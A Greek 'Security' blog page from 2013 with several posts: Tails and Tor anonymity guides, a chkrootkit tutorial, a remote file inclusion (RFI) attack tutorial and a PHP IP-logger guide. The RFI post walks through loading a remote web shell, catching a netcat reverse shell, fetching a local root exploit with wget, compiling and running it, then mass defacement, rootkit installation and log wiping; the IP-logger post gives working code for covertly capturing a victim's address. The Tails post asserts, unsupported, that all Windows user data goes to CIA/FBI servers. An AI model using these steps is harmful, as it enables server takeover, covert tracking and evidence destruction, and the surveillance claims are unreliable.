!ΠΡΟΣΟΧΗ ΠΡΟΣ ΤΟΥΣ ΑΝΑΓΝΩΣΤΕΣ!

ΠΡΟΣΟΧΗ ΠΡΟΣ ΤΟΥΣ ΑΝΑΓΝΩΣΤΕΣ!
**** Σε αυτό το blog μερικά από τα άρθρα είναι αναδημοσιεύσεις από άρθρα του διαδικτύου και άλλα είναι προσωπικά tutorial που αναφέρονται σε διάφορα θέματα. Τα παραπάνω έγιναν για ενημέρωση του κοινού και εμπλουτισμό της εκπαιδευτικής διεύρυνσης. Όλα τα άρθρα είναι για εκπαιδευτικούς και μόνο σκοπούς. Δεν φέρω καμία ευθύνη εάν κάποιος αναγνώστης τα χρησιμοποιήσει κακόβουλα. ****
Εμφάνιση αναρτήσεων με ετικέτα Security. Εμφάνιση όλων των αναρτήσεων
Εμφάνιση αναρτήσεων με ετικέτα Security. Εμφάνιση όλων των αναρτήσεων

Δευτέρα 4 Μαρτίου 2013

Τails... Διανομή αποκλειστικά για ανωνυμία και ασφάλεια

Αναφορές στο θέμα Ανωνυμίας και Ασφάλειας δεν θα σταματήσουμε ποτέ να κάνουμε. Όχι τουλάχιστον μεχρι αυτά να γίνουν δεδομένα και δικαίωμα του κάθε χρήστη. Και αυτή τη στιγμή κακά τα ψέματα η ανωνυμία και η ασφάλεια βάλλονται. Οι κυβερνήσεις, αυτοί οι μηχανισμοί βίας, μέσω των υπηρεσιών ασφαλείας κάνουν τα πάντα για να μην έχουν κανένα δικαίωμα στην ανωνυμία οι άνθρωποι.
Θέλεις με δημόσιες κάμερες, οι οποίες στο πρόσχημα της τρομοκρατίας και άλλων τέτοιων χρησιμοποιούνται για άλλους λόγους, θελεις με επιβολή νόμων που επιβάλει την χρήση πιστωτικής κάρτας, με συμβούλια και ελέγχους στην δημοσιογραφία, με δυνάμεις καταστολής και βέβαια με κάθε τρόπο επιβολή αυτών και στο διαδίκτυο.
Βλέπετε το διαδίκτυο είναι το τελευταίο μέρος πλέον όπου καποιος μπορεί ακόμα να μιλήσει ελεύθερα και να ενημερώνει τους ανθρώπους. Και αυτό ενοχλεί τις κυβερνήσεις και το ίδιο το σύστημα, καθώς δείχνει πόσο σάπια και ψεύτικα είναι.
Πρέπει να γίνει κατανοητό στον καθένα πως το δικαίωμα στην ανωνυμία είναι δικαίωμα. Αυτό είναι ανομία και όχι παρανομία, όπως προσπαθούν να πείσουν οι κονδυλοφόροι της “ενημέρωσης” και οι κυβερνητικοί εκπρόσωποι.
Κατανοώ πως ο λεγόμενος καθημερινός χρήστης είναι δύσκολο να ξεχωρίσει κάποια βασικά πράγματα και πως πιστεύει ότι όλα στο διαδίκτυο είναι ρόδινα και ωραία.
Όμως η αλήθεια δεν είναι καθολου έτσι. Οι δυνάμεις καταστολής ψάχνουν και βρίσκουν εξιλαστήρια θύματα, παρουσιάζοντας τα ως τρομοκράτες και ως διασαλευτές της (λεγόμενης) δημόσιας ασφάλειας.
Στο παρελθόν, έχουμε αναφέρει πολλά για το δικαίωμα στην ανωνυμία και την ιδιωτικοτητα. Έχουμε μάλιστα δώσει και ένα… επικό άρθρο με όλα όσα πρέπει να ξέρει και να κάνει καποιος ώστε να έχει αυτά κατά την περιήγηση του στο διαδίκτυο.
Πρέπει πρώτα απ’ όλα να γίνει κατανοητό πως η άρση της ανωνυμίας ξεκινάει από την στιγμή που συνδεόσαστε στο διαδίκτυο και ανοίγετε το λειτουργικό σας σύστημα. Είναι γεγονός πως η Microsoft και τα Windows δεν θέλουν την ανωνυμία και πως όλα μα όλα τα δεδομένα των ανθρώπων που χρησιμοποιούν αυτό το λειτουργικό σύστημα, ταξιδεύουν σε servers της εταιρείας, της CIA/FBI και ανά πάσα στιγμή είναι στη διάθεση οποίας κρατικής υπηρεσίας τα θελήσει.
Ακόμα και οι υποτιθέμενες ιδιωτικές σας συνομιλίες μέσω του Skype καταγράφονται, αποθηκεύονται και ανά πάσα στιγμή μπορούν να χρησιμοποιηθούν εναντίον σας.
Τι και αν δεν είπατε τίποτα κακό, τι και αν έχετε δίκιο, αυτά δεν ενδιαφέρουν καθολου τις δυνάμεις καταστολής. Ακριβώς όπως γίνεται και στην καθημερινότητα. Ρίξτε μια μάτια γύρω σας και δείτε τα υπεροπτικά πρόσωπα των ένστολων που έχουν αυξηθεί ανησυχητικά, οι οποίοι αντιμετωπίζουν τον κάθε άνθρωπο ως εγκληματία, ενώ αυτοί είναι οι… “αθώες περιστερές” και τα πιστά σκυλιά του συστήματος.
Έτσι ακριβώς γίνεται και στο διαδίκτυο και ας μην το μαθαίνετε ποτέ. Οι κυβερνήσεις, μέσω των υπηρεσιών ασφαλείας, θέλουν, απαιτούν τα δεδομένα των ανθρώπων, ώστε να τους… εξηγήσουν τι σημαίνει “δικαιοσύνη”.
Και ας μη πει καποιος ότι ξεφεύγω, επειδή το ίδιο συμβαίνει και στο διαδίκτυο. Υπάρχουν μάτια που παρακολουθούν τα πάντα και εταιρείες (οι λεγόμενοι κολοσσοί) οι οποίοι πρόθυμα και χωρίς δεύτερη κουβέντα δίνουν συνήθως τα δεδομένα και τους ανθρώπους στα νύχια των δυνάμεων καταστολής.
Φυσικά το ίδιο θα κάνει και ο provider σας. Αυτή η εταιρεία δηλαδη η οποία σας παρέχει την πρόσβαση σε ένα κοινωνικό αγαθό όπως το διαδίκτυο, χρεώνοντας σας παράλογα (40 ευρώ τον μήνα ο ΟΤΕ, για παράδειγμα και βέβαια, ακόμα και αν οι κυβερνήσεις “ξεχάσαν”, εμείς δεν ξεχνάμε το βρωμερό παιχνίδι της Vofafone και τις υποκλοπές).
Αν κάποιοι έχετε στραβώσει με τα παραπάνω και τα θεωρείτε υπερβολές, αλλάξτε θέμα η ακόμα καλύτερα αλλάξτε σελίδα. Ένα κλικ μακρυά σας είναι το Facebook και οι εθνικοπατριωτικές σελιδες.
Και έχοντας κάνει ξεκάθαρα κάποια πράγματα, ας περάσουμε και στην ουσία για την ανωνυμία και ιδωτικοτητα στο διαδίκτυο.
Δεν χρειαζεται να έχετε γνώσεις ιδιαίτερες ώστε να επιτύχετε κάτι τέτοιο. Υπάρχουν κάμποσες Linux διανομές που έρχονται έτοιμες για κάτι τέτοιο με τα ανάλογα εργαλεία.

Talis

Μια όμως διανομή του είδους, πιο προσιτή και με όλα τα αναγκαία για ασφάλεια και ανωνυμία είναι το Tails που προέρχεται από τα ακρωνύμια των λέξεων: The Amnesic Incognito Live System.
Η διανομή αυτή δεν απαιτεί καν εγκατάσταση, μα μπορεί να τρέξει live από κάποιο δισκάκι η usb stck.
Παρέχει μια ολοκληρωμένη σειρά ευκολοχρηστων εργαλείων τα οποία προσφέρουν:

Ανώνυμη και ασφαλή περιήγηση στο διαδίκτυο μη αρκούμενη στα όσα κάνει το Tor μα προχωρώντας περισσότερο εις βάθος αρχίζοντας από το ίδιο το σύστημα σας.
Έτσι θα βρείτε εργαλεία για ασφαλή κρυπτογράφηση μα και άμεση καταστροφή των δεδομένων σας σε περίπτωση ανάγκης, ώστε να μην μπορεί να τα ανακτήσει καποιος άλλος.
Αυτό σημαίνει πως πίσω σας δεν αφήνετε ίχνη η πως αυτά είναι πολύ δύσκολο ως σχεδον αδύνατο να ανακτηθούν καθώς απαιτούν μεγάλο κόστος και άπειρο χρόνο.
Η διανομή αυτή, παλιότερα ήταν γνωστή και ως Incognito Linux, βασίζεται στο Debian, είναι μικρή σε μέγεθος και με ένα περιβάλλον προσιτό στον οιονδήποτε.
Το μόνο που έχετε να κάνετε, είναι να την κατεβάσετε (ISO) και να την “κάψετε” σε κάποιο δισκάκι η ακόμα και σε κάποιο usb stick (με το Unetbootin).
Στη συνέχεια εκκινήστε τον υπολογιστή σας από αυτό και έτσι θα μπείτε στο περιβάλλον του Tails, το οποίο σε καμία περίπτωση δεν θα πειράξει η θα έχει κάποια επαφή με το υπάρχον η υπάρχοντα εγκατεστημένα λειτουργικά σας συστήματα.

Το να χρησιμοποιείτε το Tails η όποια άλλη διανομή και εργαλείο ανωνυμίας και να κάνετε login στο Facebook, το Gmail σας και άλλες υπηρεσιες, ΔΕΝ έχει κανένα απολύτως νόημα, καθώς στη πράξη καταργείτε την ανωνυμία σας

Τετάρτη 27 Φεβρουαρίου 2013

Anti-Virus Forensics Tool - Backtrack 5 R3 Tutorial

Γεια σας... Όπως είναι γνωστό σε όλους από τότε που φτιάχτηκαν οι υπολογιστές άρχισαν να δημιουργούνται και ιοί που βλάπτου το κάθε λειτουργικό σύστημα έτσι ώστε να δυσλειτουργεί. Αυτό δεν ισχύει μόνο για το λειτουργικό των windows. Σε όλα τα λειτουργικά υπάρχουν ιοί ακόμα και στα linux η διαφορά είναι ότι κάποια λειτουργικά συστήματα είναι πιο ανθεκτικά σε προσβολές από ιούς. Σε αυτό τον εκπαιδευτικό οδηγό θα αναλύσουμε ένα αρκετά χρήσιμο εργαλείο που υπάρχει στις διανομές των Backtrack 5 και είναι το chkrootkit (Check Rootkit). Υπάρχει ακόμα ένα εργαλείο αλλά αυτό θα αναλυθεί σε επόμενο tutorial. 
Το chkrootkit είναι ένα πρόγραμμα για συστήματα τύπου unix και συγκεκριμένα υπάρχει στη λίστα εργαλείων του backtrack 5 και το οποίο έχει στόχο να βοηθάει τον διαχειριστή να ελέγχει το σύστημα όχι μόνο για τυχόν ιούς αλλά και για δυσλειτουργίες του συστήματος για τυχόν προσβολές του συστήματος από τρίτους κατά την περιήγηση στο ιντερνετ. Είναι να φανταστούμε κάτι όπως το ccleaner των windows αλλά έχει επιπρόσθετο antivirus, antispam κτλ. Αποτελεί ένα πολύ χρήσιμο εργαλείο για κάποιον που ξέρει καλά να χρησιμοποιεί στο έπακρο τις τεράστιες δυνατότητες που παρέχει το backtrack 5 στους χρήστες του.
Παρακάτω θα δείξουμε πώς το χρησιμοποιούμε:

Βήμα 1. Πρώτα απ'όλα ανοίγουμε ένα τερματικό από την επιφάνεια εργασίας του Backtrack 5 R3 και πληκτρολογούμε: cd /pentest/forensics/chkrootkit/
Βήμα 2. Στη συνέχεια πληκτρολογούμε:  ./chkrootkit –help (περιμένουμε λίγο και μας ανοίγει ένα κείμενο με τις εντολές του εν λόγο εργαλείου).



Βήμα 3. Τώρα πληκτρολογόντας την εντολή ./chkrootkit -l στο τερματικό το αφήνουμε να κάνει τεστ.




Βήμα 4. Σε αυτό το βήμα ελέγχουμε αν οι φάκελοι μας στο σύστημα έχουν προσβληθεί από τρίτους. Αυτό γίνεται πληκτρολογόντας τις δυο παρακάτω εντολές
  • ./chkrootkit login
  • ./chkrootkit sshd

Βήμα 5. Για να κάνουμε ένα πλήρες τεστ σε όλο το σύστημα μας πληκτρολογούμε: ./chkrootkit και όπως φαίνεται παρακάτω στις εικόνες γίνεται γενικός έλεγχος και στο τέλος προκύπτει μια λίστα με τα αποτελέσματα.





Δευτέρα 25 Φεβρουαρίου 2013

Επιθέσεις R.F.I (Remote File Inclusion)

Σε προηγούμενο tutorial είχαμε αναφέρει γενικά τα είδη των διαδικτυακών επιθέσεων. Σε αυτό λοιπόν το tutorial θα αναλύσουμε με λεπτομέρειες τι είναι το R.F.I, θα πούμε πως γίνεται όπως επίσης θα αναφέρουμε και τρόπους προστασίας.
Η μέθοδος αυτή αφορά την εκτέλεση ενός κακόβουλου προγράμματος (για την ακρίβεια ενός webshell) από έναν μη εξουσιοδοτημένο χρήστη, σε μια ευάλωτη σε αυτού του είδους την επίθεση ιστοσελίδα που φιλοξενείται σε κάποιον server. Το συγκεκριμένο κενό ασφαλείας μας επιτρέπει να συμπεριλάβουμε ό,τι κώδικα θέλουμε στην URL, όπως για παράδειγμα την εκτέλεση ενός webshell.
Στο διαδίκτυο μπορεί να βρει κανείς διάφορα webshells. Με τη χρήση αυτών λοιπόν, πολλές φορές, μπορούμε να εγκαταστήσουμε κάποιο keylogger, trojan, backdoor. Μπορούμε ακόμα και να πάρουμε τον έλεγχο του λειτουργικού συστήματος του σέρβερ δηλαδή να πάρουμε root access (own the box).
Το webshell είναι μια σελίδα γραμμένη σε php ή asp τις περισσότερες φορές (γενικά όμως dynamic pages κτλ.) η οποία δίνει την δυνατότητα στον επιτιθέμενο να δει τα περιεχόμενα των φακέλων του site, να διαχειρίζεται αρχεία (προσθήκη, επεξεργασία, ανέβασμα κτλ) ανάλογα βέβαια πάντα και με τα permissions, κι όπως είπαμε και προηγουμένως ακόμα και να rootarei το box!
Το συγκεκριμένο κενό ασφαλείας οφείλεται στον κακό προγραμματισμό (τι άλλο θα μπορούσε δηλαδή;) κι επεξηγώ... Εάν κοιτάξουμε στον κώδικα του php αρχείου προσεχτικά θα βρούμε σε κάποιο σημείο το εξής καλούδι:

include($page . '.php');
Τι σημαίνει δηλαδή αυτό; Σημαίνει ότι η συνάρτηση include() δέχεται χωρίς κανένα πρόβλημα ό,τι της σερβίρουμε. Μα φυσικά τι άλλο εκτός από το ωραίο, συναρπαστικό αλλά πάνω απ' όλα κακόβουλο (για τον admin, όχι για εμάς) shellaki μας.

Δηλαδή, έχουμε το εξής site:http://www.site.gr/index.php?page=index.php
Εμείς λόγω του κενού αυτού που αναφέραμε, μπορούμε να το τροποποιήσουμε λιγάκι το url, δηλαδή να εκτελέσουμε το εξής:

http://www.site.gr/index.php?

page=http://www.remotewebserver.gr/shell.php

ώστε να το κάνουμε να διαβάζει το shell μας το οποίο έχουμε ανεβάσει σε έναν
remote web server. Επίσης, έχουμε την δυνατότητα να ανεβάσουμε το shell ως .txt αρχείο για να μην μπορούν οι άλλοι να δουν τα περιεχόμενα του δικού μας site.

Εκτελούμε δηλαδή:
http://www.site.gr/index.php?

page=http://www.remotewebserver.gr/shell.txt?

Το ερωτηματικό το βάζουμε για να πούμε στον σέρβερ να διαβάσει το αρχείο shell.txt ως php κι όχι ως txt. Να σημειώσω ότι μερικές φορές το ερωτηματικό δεν επαρκεί για να “ξεγελάσει” το website. Ενδέχεται λοιπόν να πρέπει να προσθέσουμε null bytes για να εκτελεστεί κανονικά.
Αυτό το κάνουμε δίνοντας την εξής εντολή:

http://www.site.gr/index.php?
page=http://www.remotewebserver.gr/shell.txt?

Πως μπορούμε να εντοπίζουμε τέτοιου είδους κενά ασφαλείας;


Τέτοιες αδυναμίες μπορούμε να βρούμε εάν κατέχουμε ορισμένες γνώσεις προγραμματισμού. Συνήθως όμως τις βρίσκουμε με Vulnerability Scanners (nikto, acunetix, darkjumper_script κτλ). Μπορούμε όμως να βρούμε τέτοιου είδους ευάλωτες ιστοσελίδες και μέσω των γνωστών μας google dorks, ακόμα κι από bots που τρέχουν σε IRC Servers.

Πως ελέγχουμε αν είναι όντως ευάλωτο σε R.F.I επιθέσεις το συγκεκριμένο link;


Έχουμε το εξής site:

http://www.site.gr/index.php?page=index.php

Για να ελέγξουμε εάν είναι τρωτό στο συγκεκριμένο bug αντικαθιστούμε το index.php με όποια σελίδα να ‘ναι.
Μπορούμε να κάνουμε δηλαδή το εξής απλό:

http://www.site.gr/index.php?page=www.google.gr

Εάν φορτώσει το google μέσα στη σελίδα μας, τότε σημαίνει ότι το site αυτό είναι ευάλωτο σε αυτού του είδους τις επιθέσεις.Που ανεβάζω το shellaki μου; Προφανώς δεν θα το ανεβάσουμε σε κάποιον δικό μας σέρβερ λόγω tracing. Οπότε, μπορούμε να κάνουμε το εξής απλό και να ανεβάσουμε τα διάφορα shellakia μας σε έναν free host.

Που θα βρούμε έναν τέτοιον;

Υπάρχουν πάρα πολλοί στο διαδίκτυο και με ένα απλό googlarisma βρίσκεις.
Παραδείγμα:

Αφού ανεβάσουμε το shell μας, πάμε να πάρουμε το direct link του αρχείου.
Το link που θα πάρουμε θα είναι της ακόλουθης μορφής:

http://www.speedyshare.com/files/12345678/shell.php
http://www.speedyshare.com/files/12345678/shell.txt

Το direct link στον συγκεκριμένο σέρβερ προκύπει εάν πριν από το όνομα προσθέσουμε download/
Δηλαδή τα direct links είναι το εξής:

http://www.speedyshare.com/files/12345678/download/shell.php
http://www.speedyshare.com/files/12345678/download/shell.txt

Εμείς ανεβάζουμε το shell και ως .php αλλά και ως .txt αρχείο γιατί δεν ξέρεις τι θα βολεύει κάθε φορά (άλλες φορές θα χρησιμοποιούμε το shell κι άλλες το txt).

ΣΗΜΕΙΩΣΗ: Καλό είναι να έχουμε ανεβασμένα 2-3 shells καθώς ορισμένες φορές μπορεί το ένα να μην μπαίνει και να μπαίνει το άλλο. Πολύ καλό shell είναι το storm7shell. Γενικά, να χρησιμοποιείτε shells που διαθέτουν back-connection feature για να μην χρειάζετε να κάνετε upload το netcat εάν επιχειρήσετε να rootarete το box.

Πως μπορούμε να διατηρήσουμε την πρόσβαση μας στο site;


Εάν έχουμε τα κατάλληλα δικαιώματα μπορούμε να ανεβάσουμε το ίδιο το shell στο site. Έτσι θα έχουμε πρόσβαση ανά πάσα στιγμή το επιθυμούμε, όσο το shell θα παραμένει ανεβασμένο στην σελίδα ανεξάρτητα από το εάν έχει διορθοθεί το bug. Φυσικά, δεν το κάνουμε όπως να ‘ναι. Το shell θα το ανεβάσουμε σε ένα απομακρυσμένο directory και με όνομα τέτοιο ώστε να μην κινεί ιδιαίτερα υποψίες, όπως changelog.php, default.php, default_pages.php κλπ.Πως μπορούμε να rootaroume έναν Linux Server με SAFE MODE:OFF.
Καταρχάς, θα χρειαστούμε το NetCat και ένα Local Root Exploit (ανάλογα πάντα βέβαια την έκδοση του server που έχουμε βάλει στο shell). Εφόσον έχουμε ανεβάσει το shell πάμε να μάθουμε πρώτα απ’ όλα ποια είναι η έκδοση του box.
Δίνουμε λοιπόν την εντολή: uname –a
Πάμε τώρα να κάνουμε back-connection μέσω του shell.
Ανοίγουμε το NetCat στον υπολογιστή μας και το προστάζουμε να κάνει listen σε μια συγκεκριμένη θύρα.
Σημείωση: Η θύρα αυτή θα πρέπει να είναι ρυθμισμένη δηλαδή να γίνεται forward από το router και να μην υπάρχει θέμα με το firewall μας (πολύ απλά κλείστε το). Η default port για το storm7shell είναι η θύρα 5992. Γενικά, σε όλα τα shellakia με back-connection features σου γράφουν αυτά σε ποια θύρα πρέπει να κάνεις listen, αν και μπορείς να βάλεις όποια θύρα κάνεις κέφι εσύ. Δίνουμε λοιπόν την εξής εντολή στο NetCat για να ξεκινήσει το listening:
nc -n -l -v -p 5992
NetCat respond: listening on [any] 5992 ...
Στην φόρμα της IP βάζουμε την IP μας. Στην φόρμα της θύρας βάζουμε την θύρα την οποία ανοίξαμε και στην οποία ακούει το NetCat. Εάν πατήσουμε Connect, το shell θα μας απαντήσει:
Now script try connect to port 5992 ...
Εάν οι ρυθμίσεις μας είναι όλες σωστές τότε το NetCat θα μας δώσει το shell του σέρβερ. Συνεχίζουμε τώρα το rooting process. Πρέπει να βρούμε τώρα έναν εγγράψιμο φάκελο με σκοπό να κατεβάσουμε και να κάνουμε compile το Local Root Exploit το οποίο θα μας δώσει root privileges στο box. To exploit εξαρτάται από την έκδοση του kernel του εκάστοτε box. Μερικές φορές τα exploits αυτά δεν δουλεύουν επειδή μπορεί να τα έχουν κάνει patch τα bugs του kernel ή να μην έχουμε τα κατάλληλα permissions.
Μπορούμε να βρούμε εγγράψιμους φακέλους δίνοντας την εντολή:
find / -perm -2 -ls

Μπορούμε να χρησιμοποιήσουμε τον φάκελο /tmp που είναι σίγουρα εγγράψιμος φάκελος. Οπότε δίνουμε την εξής εντολή:
cd /tmp
Για να κατεβάσουμε το local root exploit μπορούμε να χρησιμοποιήσουμε την εντολή wget που είναι για download στο linux.
Για παράδειγμα:
wget http://www.remotewebhost.gr/rootexploit.c
Αφού κατεβάσουμε το exploit πρέπει να το κάνουμε compile. Όμως, πριν κάνουμε το compile θα πρέπει να διαβάσουμε τυχόν οδηγίες που παρέχονται. Για το exploit με όνομα ‘rootexploit’ πρέπει να γράψουμε:
gcc rootexploit.c -o rootexploit
Τώρα λοιπόν κάναμε το rootexploit εκτελέσιμο. Για να τρέξουν ορισμένα exploits χρειαζόμαστε ένα πολύ μεγάλο αρχείο στο δίσκο προκειμένου να τρέξει κανονικά και να πάρουμε root access (πχ. το h0llyshit exploit). Δεν θέλουν όμως όλα (ίσως λίγα μόνο θέλουν), οπότε θα πρέπει να το ψάξετε λίγο το συγκεκριμένο θέμα. Πρέπει να δημιουργήσουμε ένα μεγάλο αρχείο στο /tmp ή σε κάποιον άλλον εγγράψιμο φάκελο.
Η εντολή είναι:
dd if=/dev/urandom of=largefile count=2M
Όπου largefile είναι το όνομα του αρχείου. Θα χρειαστεί να περιμένουμε 2-3 λεπτά μέχρι να δημιουργηθεί ο φάκελος. Εάν η εντολή αποτύχει, μπορούμε να δοκιμάσουμε την εξής εντολή:
dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024
Τώρα, μπορούμε να προχωρήσουμε στο τελευταίο στάδιο το οποίο είναι να τρέξουμε το exploit. Δίνουμε λοιπόν την εξής εντολή:
./rootexploit largefile
ή εάν είμαστε σε διαφορετικό εγγράψιμο φάκελο και το largefile έχει δημιουργηθεί στο φάκελο /tmp δίνουμε την εξής εντολή:
./rootexploit /tmp/largefile
Εάν το exploit δεν απαιτεί την παραπάνω διαδικασία, απλά δίνουμε την εξής εντολή:
./rootexploit
Εάν δεν παρουσιαστούν σφάλματα (γιατί όπως είπαμε μπορεί να έχει εγκατασταθεί κάποιο patch για τον kernel κτλ) θα γίνουμε root. Για να ελέγξουμε σίγουρα εάν γίναμε root πατάμε την εντολή:
whoami
Με την εντολή αυτή βλέπουμε το όνομα του χρήστη μας. Οπότε εάν δούμε root, τα καταφέραμε. Τώρα που γίναμε root μπορούμε να κάνουμε mass deface όλα τα sites του σέρβερ ή να εγκαταστήσουμε ένα rootkit (πχ. SSHDoor) και να πάρουμε ssh/telnet shell access στον σέρβερ. Όταν παίρνουμε access στο box θα πρέπει να σβήνουμε και τα logs ώστε να αποφεύγουμε το tracing. Αυτό μπορεί να επιτυγχανθεί με έναν log cleaner. Δεν θα δώσω tips κλπ γι’ αυτό μιας και είναι μια άλλη μεγάλη ιστορία από μόνο του.

Τρόποι Προστασίας


Η βασική αιτία που συμβαίνουν οι επιθέσεις αυτές οφείλεται στο configuration της γλώσσας PHP στον εκάστοτε server η οποία έχει «σεταριστεί» έτσι ώστε να επιτρέπει την κλήση προγραμμάτων από άλλα sites.
Μια λύση για να μην μπορεί κάποιος να «τρέξει» απομακρυσμένο κώδικα στο site μας, είναι να δώσουμε συγκεκριμένες τιμές σε κάποιες μεταβλητές περιβάλλοντος της γλώσσας PHP, μέσα στο αρχείο PHP.INI (http://www.php.net/manual/en/ini.php):
  • allow_url_fopen = false
Θέτοντας την μεταβλητή αυτή false, δεν επιτρέπεται σε κάποιον να εκτελέσει ένα πρόγραμμα σε απομακρυσμένο server.

  • safe_mode = true
H παραπάνω μεταβλητή έχοντας την τιμή true δεν θα επιτρέψει σε κάποιον να
εκτελέσει συναρτήσεις του στυλ system(),exec() κλπ. Δηλαδή συναρτήσεις που
εκτελούν εντολές του λειτουργικού συστήματος. Η συγκεκριμένη όμως μεταβλητή δεν υποστηρίζεται στη Php 6.0. Το σκεπτικό είναι ότι η Php δεν πρέπει να ασχολείται με τόσο «συστημικά ζητήματα» τα οποία μπορούν να επιλυθούν από το security του ίδιου του λειτουργικού (π.χ. με τον καθορισμό access rights κλπ - http://us2.php.net/manual/en/features.safe-mode.php).

  • Χρησιμοποιείτε στα προγράμματα σας την συνάρτηση της php file_exists(). Με αυτόν τον τρόπο μπορείτε να ελέγχετε αν υπάρχει το αρχείο που θα κληθεί να εκτελεστεί στον τοπικό σας δίσκο. Αν το αρχείο δεν υπάρχει στον τοπικό δίσκο αλλά υπάρχει σε κάποιον απομακρυσμένο server, η συνάρτηση θα επιστρέψει false!Για περισσότερες και πιο «ζουμερές» λεπτομέρειες ανατρέξτε στο

http://us2.php.net/manual/en/ref.filesystem.php#ini.allow-url-fopen
http://us2.php.net/manual/en/features.remote-files.php

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Σάββατο 23 Φεβρουαρίου 2013

Εγκατάσταση του Τοr στο BackTrack 5 R3


Σε αυτό το tutorial θα εξηγήσουμε πως γίνεται η εγκατάσταση του Tor στο Backtrack 5 R3 αλλά και σε οποιοδήποτε BackTrack. Πρώτα απ' όλα να αναφέρουμε ότι το Tor είναι ένα εργαλείο που μας παρέχει ανωνυμία στο διαδίκτυο. Με άλλα λόγια με το Tor μπορούμε να σερφάρουμε στο ιντερνετ με ασφάλεια χρησιμοποιόντας άλλη ΙΡ. Το παραπάνω link δείχνει αναλυτικά τη διαδικασία εγκατάστασης του στο BackTrack.

Α) Πρώτα απ' όλα πρέπει να κατεβάσουμε το αρχείο από την ιστιοσελίδα διανομής του που είναι https://www.torproject.org/.

Β) Στη συνέχεια ανοίγοντας ένα terminal πληκτρολογούμε:

tar -xvzf (αντιγραφή και επικόλληση το πλήρες όνομα του αρχείου που κατεβάσαμε)
Με αυτή την εντολή θα μας το αποσυμπιέσει το αρχείο στην επιφάνεια εργασίας.

Γ) Επόμενο βήμα είναι να ανοίξουμε το φάκελο του αρχείου που αποσυμπιέσαμε και να ανοίξουμε το αρχείο με όνομα tor-browser_en US. Θα μας εμφανίσει σφάλμα στο άνοιγμα του. Για να διορθώσουμε το σφάλμα επιλέγουμε το κείμενο που μας έβγαλε με το σφάλμα και πατάμε αντιγραφή.

Γ) Μετά πατάμε δεξί κλικ πάνω στο εικονίδιο με το όνομα tor-browser_en US. Επιλέγουμε Open to --> gedit (έγγραφο κειμένου)
Στη συνέχεια θα μας ανοίξει ένα κωδικοποιημένο απλό έγγραφο κειμένου και επιλέγουμε την καρτέλα Search-->Find και στο πεδίο με όνομα Search to πατάμε επικόλληση το κείμενο του σφάλματος για να μας το εντοπίσει στο πεδίο.

Δ) Αφού μας βρεί το σημείο που ψάχνουμε αντικαθιστούμε το τρέχον κείμενο με ''Τοr is started'' και σβήνουμε την από κάτω γραμμή που έχει την εντολή exit. Αποθηκεύουμε και κλείνουμε το έγγραφο.

Ε) Τέλος πατάμε κλίκ για να ανοίξουμε το tor-browser_en US. Μας εμφανίζει στην οθόνη '' Τοr is started'' και μας ανοίγει το Tor. Παρακάτω παραθέτω ένα σχετικό video που δείχνει τη διαδικασία εγκατάστασης του Tor...

Τετάρτη 20 Φεβρουαρίου 2013

Πως βρίσκω την ΙΡ διεύθυνση ενός υπολογιστή


Σήμερα θα σας δείξω πως μπορούμε να βρούμε την ΙΡ διεύθυνση ενός απόμακρου υπολογιστή για παράδειγμα την ΙΡ ενός γνωστού μας. Πολλοί από εμάς έχουν αναρωτηθεί πώς μπορεί να γίνει αυτό. Στο συγκεκριμένο tutorial θα δείξουμε έναν από τους τρόπους που μπορεί να γίνει. Συγκεκριμένα σε αυτό το άρθρο θα δούμε πως γίνεται μέσα από το chat δηλαδή to msn messenger, yahoo messenger google talk, skype κτλ.

Τι μπορώ να κάνω γνωρίζοντας την ΙΡ διεύθυνση κάποιου υπολογιστή?

  • Μπορεί κάποιος να βρεί διάφορες πληροφορίες για τον υπολογιστή αυτόν όπως να βρεί την τοποθεσία τους τις γεωγραφικες του συντεταγμένες και πολλά αλλα. Ουσιαστικά μπορεί να κάνει το γνωστο "footprinting".
  • Επίσης ένα άλλο που μπορεί να κάνει είναι να αποκτύσει τον έλεγχο "χακάρει" του υπολογιστή και αυτό γίνεται συνήθως με τη χρήση των εργαλείων metasploit και RAT's.
Τι θα χρειαστώ?
  1. PHP script για να "πιάσει" την ΙΡ
  2. ένα .txt αρχείο για να μπορέσει το script να αποθηκεύσει την ΙΡ σε αυτό.
Διαδικασία
Βήμα 1. Ανοίγω ένα έγγραφο κειμένου και αντιγράφω σε αυτό τον παρακάτω κώδικα:

<?php
$ip = $_SERVER['REMOTE_ADDR'];
$dt = date("l dS \of F Y h:i:s A");
$file=fopen("ip_log.txt","a");
$data = $ip.' '.$dt."\n";
fwrite($file, $data);
fclose($file);
header( 'Location: http://www.google.com' ) ;
?>

Στη συνέχεια τον αποθηκεύω με το όνομα ip.php Αυτός ο κώδικας γραμμένος σε PHP είναι αυτός που θα κλέψει την ΙΡ του θύματος.

Βήμα 2. Μετά ανόιγω πάλι ένα έγγραφο κειμένου και το αποθηκεύω χωρίς να γράψω τίποτα μεσα του με το όνομα ip_log.txt Για να καταλάβετε αφού τρέξει ο κώδικας και πάρει την ΙΡ του απομακρυσμένου υπολογιστή κάπου πρέπει να την αποθηκεύσει και το κενό αρχείο κάνει αυτή ακριβώς τη δουλειά.

Βήμα 3. Δημιουργώ έναν λογαριασμό σε ένα από τα ακόλουθα free webhosting sites.
www.110mb.com
www.drivehq.com
www.t35.com
www.my3gb.com
η σε οποιοδήποτε άλλο χρησιμοποιώ. Εγώ χρησιμοποιώ τα παραπάνω.


Βήμα 4. Αφού δημιουργήσω το λογαριαμό ανεβάζω τα 2 αρχεία που έφτιαξα στους free webhosting server.

Βήμα 5. Στέλνω το ip.php script στο φίλο μου ή το γνωστό μου που θέλω να πάρω την ΙΡ του και αυτός μόλις το ανοίξει αμέσως η ΙΡ του θα πάει και θα αποθηκευτεί στο στο κενό αρχείο που φτιαξαμε και ανεβάσαμε στον free webhosting server μας.

Επίδειξη:

κάνοντας κλίκ στο ip.php link.Τώρα η IP address αποθηκεύτηκε στο ip_log.txt

Μπορώ να ελέγξω στοιχεία της ΙΡ στη σελίδα www.showmyip.com
Επίσης μπορώ να βρώ την τοποθεσία του υπολογιστή από τη διεύθυνση www.ip2location.com

